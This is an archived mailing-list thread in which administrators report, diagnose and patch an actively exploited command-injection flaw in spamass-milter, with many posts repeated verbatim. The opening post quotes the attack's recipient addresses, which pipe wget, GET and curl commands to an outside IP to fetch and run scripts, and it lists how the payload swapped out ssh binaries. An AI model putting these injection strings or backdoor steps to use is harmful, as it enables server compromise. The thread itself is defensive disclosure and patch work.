Discussion:
[users] spamassassin or spamass-milter exploit
Paul Heinlein
2010-03-16 19:08:17 UTC
Permalink
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.

The system described below runs x86_64 release of CentOS 5.4. SELinux
was, at the time, in Permissive mode. The packages involved, as far as
I can tell, are

* spamassassin-3.2.5-1.el5.rf
* spamass-milter-0.3.1-1.el5.rf
* sendmail-8.13.8-2.el5 (not rpmforge, obviously)

Mar 15 05:47 (times are PDT): Several messages arrived with suspicious
recipients:

<root+:>
<root+:"|wget http://61.100.185.177/busy-1.php">
<root+:"|GET http://61.100.185.177/busy-2.php">
<root+:"|curl http://61.100.185.177/busy-3.php">

Sendmail recognized the addresses as syntactically evil, but a process
running under the spamass_milter_t context ran wget, GET, and curl and
connected to the IP address in the addresses above.

The file(s) downloaded by these processes executed a shell script. It
did several things, the highlights of which are

1. It downloaded, uncompressed, and untar-ed a file named
xS.tar.gz. The resulting directory name was /xS.

2. It tried to add a unix group and user named "sshd"; the attempt
failed, probably because there's already an sshd user and group
on the system.

3. It installed 32-bit Linux executables in place of /usr/bin/ssh
and /usr/sbin/sshd. The new executables were dynamically linked
against a small number of libraries, but most of the supporting
libraries had been compiled directly into the applications.

4. It installed a minimal /etc/ssh/sshd_config and an empty
/etc/ssh/ssh_config.

5. After verifying that sshd was in the process table, it
removed the /xS directory.

6. It created an empty file name /dev/devno

7. It restarted sshd using /sbin/service

Again, this was all done under the spamass_milter_t security context.

I don't know enough about the sendmail <-> spamass-milter <-> spamd
pipeline to have a definitive idea about what application misparsed
the piped e-mail addresses and executed them.

I saw the attack again this morning, but by then I'd cleaned things up
and gotten SELinux back into Enforcing mode, which prevented the
exploit from working again.
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Paul Heinlein
2010-03-16 21:19:25 UTC
Permalink
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
Belatedly, I found a notice:

http://seclists.org/fulldisclosure/2010/Mar/267

And some exploit code:

http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Steven Haigh
2010-03-16 23:52:14 UTC
Permalink
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized:
"XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X"

Am I reading this right?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 02:19:45 UTC
Permalink
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"

Am I reading this right as this setup is not vunerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 03:20:39 UTC
Permalink
Ah,

It seems that the -x option for spamass-milter is what makes this
vulnerable.

See: http://www.exploit-db.com/exploits/11662

If you don't run spamass-milter with the -x option, this vulnerability
does not work.
Post by Steven Haigh
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"
Am I reading this right as this setup is not vunerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 03:20:39 UTC
Permalink
Ah,

It seems that the -x option for spamass-milter is what makes this
vulnerable.

See: http://www.exploit-db.com/exploits/11662

If you don't run spamass-milter with the -x option, this vulnerability
does not work.
Post by Steven Haigh
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"
Am I reading this right as this setup is not vunerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 03:20:39 UTC
Permalink
Ah,

It seems that the -x option for spamass-milter is what makes this
vulnerable.

See: http://www.exploit-db.com/exploits/11662

If you don't run spamass-milter with the -x option, this vulnerability
does not work.
Post by Steven Haigh
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"
Am I reading this right as this setup is not vunerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 03:20:39 UTC
Permalink
Ah,

It seems that the -x option for spamass-milter is what makes this
vulnerable.

See: http://www.exploit-db.com/exploits/11662

If you don't run spamass-milter with the -x option, this vulnerability
does not work.
Post by Steven Haigh
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"
Am I reading this right as this setup is not vunerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 03:20:39 UTC
Permalink
Ah,

It seems that the -x option for spamass-milter is what makes this
vulnerable.

See: http://www.exploit-db.com/exploits/11662

If you don't run spamass-milter with the -x option, this vulnerability
does not work.
Post by Steven Haigh
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"
Am I reading this right as this setup is not vunerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 02:19:45 UTC
Permalink
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"

Am I reading this right as this setup is not vunerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 02:19:45 UTC
Permalink
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"

Am I reading this right as this setup is not vunerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 02:19:45 UTC
Permalink
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"

Am I reading this right as this setup is not vunerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-17 02:19:45 UTC
Permalink
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized: "<spam test string removed>"

Am I reading this right as this setup is not vunerable?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-16 23:52:14 UTC
Permalink
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized:
"XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X"

Am I reading this right?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-16 23:52:14 UTC
Permalink
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized:
"XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X"

Am I reading this right?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-16 23:52:14 UTC
Permalink
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized:
"XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X"

Am I reading this right?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-03-16 23:52:14 UTC
Permalink
On Tue, 16 Mar 2010 14:19:25 -0700 (PDT), Paul Heinlein
Post by Paul Heinlein
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
http://seclists.org/fulldisclosure/2010/Mar/267
http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
I'm kinda curious about this - as I run this combo all over the place and
from what I can understand, it looks like the stock config isn't
vulnerable.

Checking a few of my servers, I get:
220 mail.server.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 17 Mar 2010
10:49:34 +1100
250 mail.server.com Hello localhost [127.0.0.1], pleased to meet you
553 5.5.4 <root () gmail com>... Domain name required for sender address
root.gmail.com
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
500 5.5.1 Command unrecognized:
"XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X"

Am I reading this right?
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Yury V. Zaytsev
2010-03-17 08:42:03 UTC
Permalink
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!

spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what's the practical use of it), so it's not
vulnerable.

However I will be happy to include the patch that upstream is cooking
when it's ready:

http://savannah.nongnu.org/bugs/index.php?29136

I don't have time to track this page and also do not have Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.

Thanks!
--
Sincerely yours,
Yury V. Zaytsev
Steven Haigh
2010-05-07 04:07:22 UTC
Permalink
I believe I have created a properly patched SRPM to replace the one on RF
with that should fix all outstanding issues.

Its my first go at making a srpm but it compiles and runs ok on my side.

It has 3 patches included:
spamass-milter-0.3.1-popen.patch - Fixes this vulnerability.
spamass-milter-0.3.1-rcvd.patch - Fixes a minor issue with Received
headers
spamass-milter-0.3.1-smtp-auth-bypass.patch - Bypasses scanning for email
sent with SMTP auth.

You can find it at:
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm

If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.

On Wed, 17 Mar 2010 09:42:03 +0100, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!
spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what's the practical use of it), so it's not
vulnerable.
However I will be happy to include the patch that upstream is cooking
http://savannah.nongnu.org/bugs/index.php?29136
I don't have time to track this page and also do not have Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.
Thanks!
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Yury V. Zaytsev
2010-05-07 07:07:33 UTC
Permalink
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
--
Sincerely yours,
Yury V. Zaytsev
Steven Haigh
2010-05-07 08:26:40 UTC
Permalink
On Fri, 07 May 2010 09:07:33 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS is nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.

To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Yury V. Zaytsev
2010-05-07 08:34:29 UTC
Permalink
Post by Steven Haigh
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS is nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.
We never used cvs and you don't have to set up anything to access it

http://svn.rpmforge.net/svn/trunk/rpms/
Post by Steven Haigh
To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
The point is that I have to download and unpack the SRPM to fish your
patches out on a system that does not even have rpm installed.

Why everybody gives links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
--
Sincerely yours,
Yury V. Zaytsev
Steven Haigh
2010-05-07 09:18:42 UTC
Permalink
On Fri, 07 May 2010 10:34:29 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Why everybody gives links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
Ok, here is the lot. Please remove the existing smtp auth patch by me as I
created a new one with the same options to make things much more uniform
across this package. I've also edited the changelog and bumped the release
to 3.
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
-------------- next part --------------
--- spamass-milter.spec.orig 2010-03-08 00:02:19.000000000 +1100
+++ spamass-milter.spec 2010-05-07 19:12:53.000000000 +1000
@@ -5,14 +5,16 @@
Summary: Sendmail milter for spamassassin
Name: spamass-milter
Version: 0.3.1
-Release: 2%{?dist}
+Release: 3%{?dist}
License: GPL
Group: System Environment/Daemons
URL: http://savannah.gnu.org/projects/spamass-milt/

Source: http://savannah.nongnu.org/download/spamass-milt/spamass-milter-%{version}.tar.gz

-Patch0: spamass-milter-smtp-auth.patch
+Patch0: spamass-milter-0.3.1-smtp-auth-bypass.patch
+Patch1: spamass-milter-0.3.1-popen.patch
+Patch2: spamass-milter-0.3.1-rcvd.patch

BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-root

@@ -26,7 +28,9 @@

%prep
%setup -q
-%patch0 -p0 -b .smtpauth
+%patch0 -p1 -b .smtpauth
+%patch1 -p1 -b .popen
+%patch2 -p1 -b .rcvd

%{__cat} <<EOF >spamass-milter.sysconfig
### Override for your different local config
@@ -154,6 +158,10 @@
%{_sbindir}/spamass-milter

%changelog
+* Fri May 07 2010 Steven Haigh <netwiz at crc.id.au> - 0.3.1.3
+- Added patch to fix CVE-2010-1132.
+- Added patch to fix Received-header generation; this adds a space before the "(" between macro_j and macro_v.)
+
* Sun Mar 07 2010 Yury V. Zaytsev <yury at shurup.com> - 0.3.1-2
- Added SMTP AUTH patch by Steven Haigh.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-popen.patch
Type: text/x-c
Size: 8008 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment.bin
-------------- next part --------------
The code in spamass-milter.cpp that tries to create a
Sendmail-compatible header is broken and generates a header
that is incorrectly parsed by SpamAssassin.

This is mostly fixed in CVS apart from the space that needs
adding prior to the "(" between macro_j and macro_v.

https://savannah.nongnu.org/bugs/index.php?17178
http://bugs.debian.org/510665
http://bugzilla.redhat.com/496763

--- spamass-milter-0.3.1/spamass-milter.cpp.ori 2006-03-23 15:41:36.000000000 -0600
+++ spamass-milter-0.3.1/spamass-milter.cpp 2009-04-20 20:03:31.000000000 -0500
@@ -1002,9 +1002,9 @@

assassin->output((string)
"Received: from "+macro_s+" ("+macro__+")\r\n\t"+
- "by "+macro_j+"("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+"\r\n\t"+
+ "by "+macro_j+" ("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+";\r\n\t"+
macro_b+"\r\n\t"+
- "(envelope-from "+assassin->from()+"\r\n");
+ "(envelope-from "+assassin->from()+")\r\n");

} else
assassin->output((string)"X-Envelope-To: "+envrcpt[0]+"\r\n");
-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-smtp-auth-bypass.patch
Type: text/x-c
Size: 1232 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0001.bin
Steven Haigh
2010-05-07 09:18:42 UTC
Permalink
On Fri, 07 May 2010 10:34:29 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Why everybody gives links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
Ok, here is the lot. Please remove the existing smtp auth patch by me as I
created a new one with the same options to make things much more uniform
across this package. I've also edited the changelog and bumped the release
to 3.
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
-------------- next part --------------
--- spamass-milter.spec.orig 2010-03-08 00:02:19.000000000 +1100
+++ spamass-milter.spec 2010-05-07 19:12:53.000000000 +1000
@@ -5,14 +5,16 @@
Summary: Sendmail milter for spamassassin
Name: spamass-milter
Version: 0.3.1
-Release: 2%{?dist}
+Release: 3%{?dist}
License: GPL
Group: System Environment/Daemons
URL: http://savannah.gnu.org/projects/spamass-milt/

Source: http://savannah.nongnu.org/download/spamass-milt/spamass-milter-%{version}.tar.gz

-Patch0: spamass-milter-smtp-auth.patch
+Patch0: spamass-milter-0.3.1-smtp-auth-bypass.patch
+Patch1: spamass-milter-0.3.1-popen.patch
+Patch2: spamass-milter-0.3.1-rcvd.patch

BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-root

@@ -26,7 +28,9 @@

%prep
%setup -q
-%patch0 -p0 -b .smtpauth
+%patch0 -p1 -b .smtpauth
+%patch1 -p1 -b .popen
+%patch2 -p1 -b .rcvd

%{__cat} <<EOF >spamass-milter.sysconfig
### Override for your different local config
@@ -154,6 +158,10 @@
%{_sbindir}/spamass-milter

%changelog
+* Fri May 07 2010 Steven Haigh <netwiz at crc.id.au> - 0.3.1.3
+- Added patch to fix CVE-2010-1132.
+- Added patch to fix Received-header generation; this adds a space before the "(" between macro_j and macro_v.)
+
* Sun Mar 07 2010 Yury V. Zaytsev <yury at shurup.com> - 0.3.1-2
- Added SMTP AUTH patch by Steven Haigh.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-popen.patch
Type: text/x-c
Size: 8008 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0002.bin
-------------- next part --------------
The code in spamass-milter.cpp that tries to create a
Sendmail-compatible header is broken and generates a header
that is incorrectly parsed by SpamAssassin.

This is mostly fixed in CVS apart from the space that needs
adding prior to the "(" between macro_j and macro_v.

https://savannah.nongnu.org/bugs/index.php?17178
http://bugs.debian.org/510665
http://bugzilla.redhat.com/496763
